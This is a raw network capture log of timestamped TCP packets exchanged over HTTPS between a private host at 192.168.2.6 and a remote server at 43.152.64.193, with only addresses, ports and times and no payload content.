Jul 25, 2024 11:25:52.674750090 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.674801111 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.674808979 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.674864054 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.674864054 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.769978046 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.770004034 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.770243883 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.770267010 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.771792889 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.771811008 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.771918058 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.771927118 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.773052931 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.140213013 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.140505075 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.140525103 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.140578985 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.140724897 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.140790939 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.140798092 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.140937090 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.142625093 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.142651081 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.142700911 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.142708063 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.142723083 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.143026114 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.143770933 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.143795013 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.143847942 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.143852949 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.143924952 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.145610094 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.145637035 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.145740986 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.145746946 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.145796061 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.145796061 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.147293091 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.147342920 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.147423983 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.147423983 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.147429943 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.147664070 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.148467064 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.148493052 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.148536921 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.148541927 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.148585081 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.148585081 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.149461031 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.149554014 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.149559021 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.150019884 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.150281906 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.150299072 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.150580883 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.150585890 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.150712013 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.150863886 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.150963068 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.150966883 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.151077032 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.151108980 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.151113987 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.151148081 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.151242971 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.152075052 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.152091980 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.152209044 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.152215004 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.152414083 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.153095007 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.153112888 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.153203011 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.153208017 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.153469086 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.154833078 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.154850006 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.154917002 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.154922009 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.155062914 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.155940056 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.155977964 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.156037092 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.156044006 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.156080008 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.156080008 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.157190084 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157207012 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157263994 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.157270908 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157493114 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157553911 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.157555103 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.157561064 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157680035 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157767057 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.157772064 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.157820940 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.159570932 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.159590006 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.159665108 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.159672976 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.159723997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.159723997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.160228968 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.160448074 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.160454035 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.160582066 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.160834074 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.160937071 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.160942078 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.161103964 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.161983967 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.161999941 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.162045956 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.162051916 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.162290096 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.162976027 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.163059950 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.163064957 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.163260937 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.163453102 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.163556099 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.163561106 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.163727999 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.164616108 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.164633989 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.164690018 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.164696932 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.164927959 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.165626049 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.165704966 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.165710926 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.165802002 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.165867090 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.165873051 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.165931940 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.166481018 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.166655064 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.166660070 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.166929007 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.168437958 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.168474913 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.168541908 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.168549061 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.168885946 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.170150042 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.170166016 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.170242071 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.170248985 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.170649052 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.171106100 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.171125889 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.171190023 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.171197891 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.171206951 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.171274900 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.171298981 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.171310902 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.171315908 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.171365976 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.171365976 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.174107075 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.174127102 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.174324989 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.174335003 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.174453974 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.175035000 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.175052881 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.175185919 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.175193071 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.175379038 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.175582886 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.175604105 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.175662994 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.175668001 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.175946951 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.176155090 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.176191092 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.176215887 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.176220894 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.176263094 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.176264048 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.177272081 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.177289009 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.177372932 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.177378893 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.177630901 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.178683043 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.178704977 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.178771973 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.178780079 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.179065943 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.179780960 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.179797888 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.179867029 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.179872036 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.180131912 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.180639982 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.180658102 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.180831909 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.180839062 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.181015015 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.181361914 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.181380033 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.181478024 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.181483984 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.181677103 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.183249950 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.183271885 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.183331013 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.183336973 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.183393002 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.183631897 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.183996916 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.184012890 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.184125900 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.184129953 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.184338093 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.185172081 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.185201883 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.185234070 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.185240030 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.185281992 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.185281992 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.186806917 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.186825991 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.186889887 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.186896086 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.187388897 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.195600986 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.195621967 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.195718050 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.195724964 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.196069002 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.205121040 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.205141068 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.205224037 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.205229998 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.205568075 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.212431908 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.212454081 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.212661028 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.212677002 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.212887049 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.222513914 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.222536087 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.222687960 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.222702026 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.223063946 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.236367941 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.236387014 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.236510038 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.236531019 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.236944914 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.237353086 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.237369061 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.237416029 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.237423897 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.237462997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.237462997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.246053934 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.246094942 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.246191978 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.246191978 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.246198893 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.249500990 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.256213903 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.256246090 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.256350994 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.256361008 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.256962061 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.283890963 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.283916950 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.283998966 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.284028053 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.284061909 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.284075022 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.292841911 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.292860031 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.293014050 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.293020010 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.293366909 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.299153090 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.299169064 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.299258947 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.299264908 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.299372911 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.308715105 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.308732986 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.308804035 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.308809996 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.308841944 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.308855057 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.323349953 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.323385000 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.323492050 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.323508024 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.324449062 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.324472904 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.324640036 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.324640036 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.324650049 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.326833010 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.332427025 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.332479954 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.332508087 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.332518101 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.332550049 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.332550049 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.342935085 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.342962980 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.343085051 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.343085051 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.343095064 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.344129086 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.370704889 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.370731115 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.370919943 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.370930910 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.371412039 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.375664949 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.375715017 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.375771999 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.375771999 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.375780106 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.375797033 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.375832081 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.375859976 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:53.376386881 CEST	49720	443	192.168.2.6	43.152.64.193
